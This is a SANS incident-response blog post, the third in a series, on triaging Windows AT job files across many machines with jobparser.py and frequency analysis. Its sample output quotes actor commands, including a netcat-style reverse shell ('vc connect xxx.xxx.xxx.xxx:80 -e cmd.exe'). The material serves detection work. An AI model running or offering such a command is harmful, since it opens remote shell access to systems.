SANS Digital Forensics and Incident Response Blog

Mass Triage Part 3: Processing Returned Files - At Jobs

Our story so far...
Frank, working with Hermes, another security analyst, goes to work to review the tens of thousands of files retrieved by FRAC. They start off by reviewing the returned AT jobs.

AT Job Used by Actors

AT jobs are scheduled tasks created using the at.exe command. AT jobs take the filename format at#.job, where # is an incrementing counter (e.g., at1.job or at42.job). Actors use them for lateral movement and/or execution of their tools on a machine. AT jobs run as the SYSTEM user, giving the actor the access needed for their tools to run. The jobs can also be scheduled remotely. There are plenty of articles on how actors use AT jobs. If you are unfamiliar with how AT jobs are created, please see Microsoft's web site at: https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks

I'll show some example actor AT jobs later in the blog post.

AT Job Analysis

Out of all the files that will get reviewed, AT job analysis takes the least amount of time. Thousands of jobs can be reviewed quickly using frequency analysis, where lines of tool output are sorted, counted, and reduced via the uniq command. Using frequency analysis, an analyst can usually mark the lines with higher frequency counts as normal or legitimate. For example, say you have 1000 machines and all 1000 machines have the same AT job. Chances are that AT job is legitimate. APT AT jobs are usually found on a smaller set of machines. Let's get into how to process the AT jobs and some example output.

To process the AT jobs here are the steps:

  1. find . -iname "at*job" -print -exec jobparser.py -f {} \; > {output file from step 1}
  2. grep Parameters {output file from step 1} | cut -d: -f 2- | sort | uniq -c | sort -h > {review filename}.txt
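The frequency-analysis half of Step 2 can be demonstrated end to end on a small, hypothetical sample of Step 1 output (the file names and parameter strings below are made up for illustration):

```shell
# Create a small sample of jobparser.py output (hypothetical values)
cat > step1_output.txt <<'EOF'
./machine01/At1.job
Application: cmd.exe
Parameters: /c start.vbs
./machine02/At1.job
Application: cmd.exe
Parameters: /c start.vbs
./machine03/At3.job
Application: cmd.exe
Parameters: /c "wde.exe >1.dll"
EOF

# Step 2: extract the Parameters lines, then count identical lines and
# rank by frequency so rare (more suspicious) lines float to the top
grep Parameters step1_output.txt | cut -d: -f 2- | sort | uniq -c | sort -h > review.txt
cat review.txt
```

The rare one-off line sorts first; the line shared by many machines sorts last, which is exactly the property the frequency review relies on.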

After running the AT jobs through Jamie Levy's jobparser.py (https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/jobparser.py), the primary line in the output that needs to be reviewed is the Parameters line. Below is example output from a single AT job from the output file from Step 1:

./machine13/At2.job
Product Info: Windows 7
File Version: 1
UUID: {260A6E48-9D8E-46C1-9511-12414604B249}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 1
Status: Task is ready to run
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Tuesday Oct 20 08:16:00.123 2015
Running Instances: 0
Application: cmd.exe
Parameters: /c start.vbs
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Oct 20 08:16:00.0 2015

Note the "Parameters" line above. This is the line to key off of when doing a mass file review. While the other data is interesting and useful, the "Parameters" line helps identify which jobs the analyst needs to examine more closely.

Step 2 Output:

1 /C "C:\xcf\bin\purgeold.bat 30"
1 /C "C:\xcf\bin\CCleanup.bat 4g"
1 /c c:\users\fred\ab.exe>thumbs.dll
1 /c "wde.exe >1.dll"
1 /c wde.exe>1.dll:
1 /c wde.exe>1.dlL
1 /c wde.exe>1.dlL'
1 /c wde.exe>>1.dLL
1 /C "pushd C:\xcf\hist && C:\xcf\bin\purgelog *.hst 7 >hstpurge.log"
1 /c "ght.exe -x>1.dll"
1 /c "ght -x>2.dll"
3 /c "start c:\users\admin\appdata\local\temp\vc connect xxx.xxx.xxx.xxx:80 -e cmd.exe -v"
4 /c system.bat
8 /c "taskkill /f /im wscript.exe"
10 /c wde.exe>1.dll
11 /c start.vbs
200 /C "C:\Program Files\Cisco Systems\CTIOSServer\purgeold.bat 30"

Can you spot the badness? Nearly everything in the list is bad. The only lines that are not bad are the ones ending in "purgeold.bat 30", "CCleanup.bat 4g", and "hstpurge.log". The other jobs listed in the above output are APT related. To briefly discuss the columns in the output: the number in the first column is the count of identical lines found in the "{review filename}.txt" file. For example:

11 /c start.vbs

There were 11 AT jobs that ran "/c start.vbs".

Next Steps

As I go through the Step 2 output file, I typically put an identifier, such as "#km ", at the end of each interesting line so that I can grep my identifier out later. To trace a line back to its AT job file, search the output file from Step 1 for the lines identified as interesting and review the rest of the AT job details. See the example AT job ./machine13/At2.job from above.
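The tagging workflow can be sketched as follows, using the "#km " identifier on hypothetical review-file contents:

```shell
# Suppose review.txt is the Step 2 output; the analyst has appended
# "#km" to lines worth a closer look (sample data for illustration)
cat > review.txt <<'EOF'
      1  /c "wde.exe >1.dll" #km
    200  /C "C:\Program Files\Cisco Systems\CTIOSServer\purgeold.bat 30"
EOF

# Pull back only the tagged lines for follow-up
grep '#km' review.txt
```

The tagged parameter strings can then be searched for in the Step 1 output (e.g., with grep and a few lines of leading context via -B) to pull back the full parsed job, including the directory path that identifies the machine.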

Note that due to the "-print" option given to the find command, it prints the directory path and file name for each AT job before showing jobparser.py's output. If FRAC/RIFT was used, the hostname of the machine the AT job came from will be in the directory path. Depending on the contents of the AT job, the machine may require further triage or deeper analysis.

The parsed AT jobs above show the following tools used by the actor:

  • wde.exe
  • ght.exe
  • c:\users\admin\appdata\local\temp\vc
  • system.bat
  • taskkill
  • start.vbs

One of the tasks the analyst needs to do next is track down these tools and review them. Per the list, only one tool had a full path. FRAC could be used to search the entire network for these tools, and a custom getfileslist.txt could be written to gather them up. The following are some example lines for the getfileslist.txt file:

  • wde.exe$
  • ght.exe$
  • system.bat$
  • start.vbs$
  • \/users\/admin\/appdata\/local\/temp\/vc*
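The entries above appear to be regular expressions matched against file paths (note the $ anchors and escaped slashes). Assuming that, the simpler entries can be sanity-checked locally with grep -f against a hypothetical file listing before handing the list to FRAC (the exact matching behavior is up to FRAC/RIFT; this is only an illustration):

```shell
# Hypothetical subset of getfileslist.txt entries (treated as regexes)
cat > getfileslist.txt <<'EOF'
wde.exe$
ght.exe$
EOF

# Hypothetical file listing from a target machine
cat > filelist.txt <<'EOF'
C:/windows/temp/wde.exe
C:/windows/system32/taskkill.exe
C:/users/fred/ght.exe
EOF

# Only the paths ending in the tool names should match
grep -f getfileslist.txt filelist.txt
```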

Note that "taskkill" was not added. The "taskkill" binary is part of the Windows OS, so it doesn't make sense to pull it back, as every system will have it. However, the analyst should work with the administrators to determine whether the use of "taskkill" was part of administrator activity.

Lastly, the date run and scheduled date fields for confirmed actor AT jobs should be added to the incident timeline. These dates and times can be used for timeline analysis of the system where the AT jobs were scheduled. The dates and times may also be useful for log analysis and network forensics.
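Pulling those timestamp fields out of the Step 1 output is a one-liner; a sketch on sample parsed-job output (hypothetical values matching the earlier example):

```shell
# Sample of jobparser.py output for a confirmed-bad job (made-up data)
cat > step1_sample.txt <<'EOF'
./machine13/At2.job
Date Run: Tuesday Oct 20 08:16:00.123 2015
Scheduled Date: Oct 20 08:16:00.0 2015
EOF

# Extract the two timestamp fields for the incident timeline
grep -E 'Date Run|Scheduled Date' step1_sample.txt
```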

Next in Part 4

In Part 4, I will discuss processing the ShimCache from the SYSTEM hives that were collected using FRAC with regards to mass triage.

 

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.
